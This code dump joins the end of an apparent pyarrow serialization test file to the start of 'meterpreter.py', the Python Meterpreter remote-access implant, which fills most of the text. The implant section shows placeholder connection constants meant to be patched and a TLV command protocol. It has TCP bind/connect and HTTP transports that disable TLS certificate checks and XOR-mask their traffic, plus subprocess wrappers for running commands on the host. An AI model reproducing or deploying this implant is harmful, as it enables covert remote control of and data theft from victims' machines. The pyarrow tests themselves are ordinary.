context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
serialization_roundtrip(obj, large_buffer,
pa.pandas_serialization_context())
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.frombuffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits(self):
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, 20*b"\x00")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a Serialization Context into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == 20*b"\x00"
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fallbact to Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with couldpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
buf = pa.frombuffer(b'hello')
components = {
'num_tensors': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowException):
pa.deserialize_components(components)
components = {
'num_tensors': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowException):
pa.deserialize_components(components)
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.frombuffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name])
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
|
meterpreter.py
|
#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
def rand_xor_key():
return tuple(random.randint(1, 255) for _ in range(4))
def xor_bytes(key, data):
if sys.version_info[0] < 3:
dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
else:
dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
return dexored
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def debug_print(msg):
if DEBUGGING:
print(msg)
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def get_native_arch():
arch = get_system_arch()
if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
arch = 'x86'
return arch
@export
def get_system_arch():
uname_info = platform.uname()
arch = uname_info[4]
if has_windll:
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
if arch == 'x86_64':
arch = 'x64'
return arch
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while offset < len(pkt):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
raise StopIteration()
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
#@export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
#@export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
#@export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
#@export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
debug_print('[*] starting process: ' + repr(args[0]))
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
xor_key = rand_xor_key()
raw = struct.pack('BBBB', *xor_key[::-1]) + xor_bytes(xor_key, pkt)
self._send_packet(raw)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 12:
packet = None # looks corrupt
break
xor_key = struct.unpack('BBBB', packet[:4][::-1])
header = xor_bytes(xor_key, packet[4:12])
pkt_length, _ = struct.unpack('>II', header)
if len(packet) - 4 != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return xor_bytes(xor_key, packet[12:])
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(12)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 12:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = struct.unpack('BBBB', packet[:4][::-1])
header = xor_bytes(xor_key, packet[4:12])
pkt_length, pkt_type = struct.unpack('>II', header)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return xor_bytes(xor_key, packet)
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
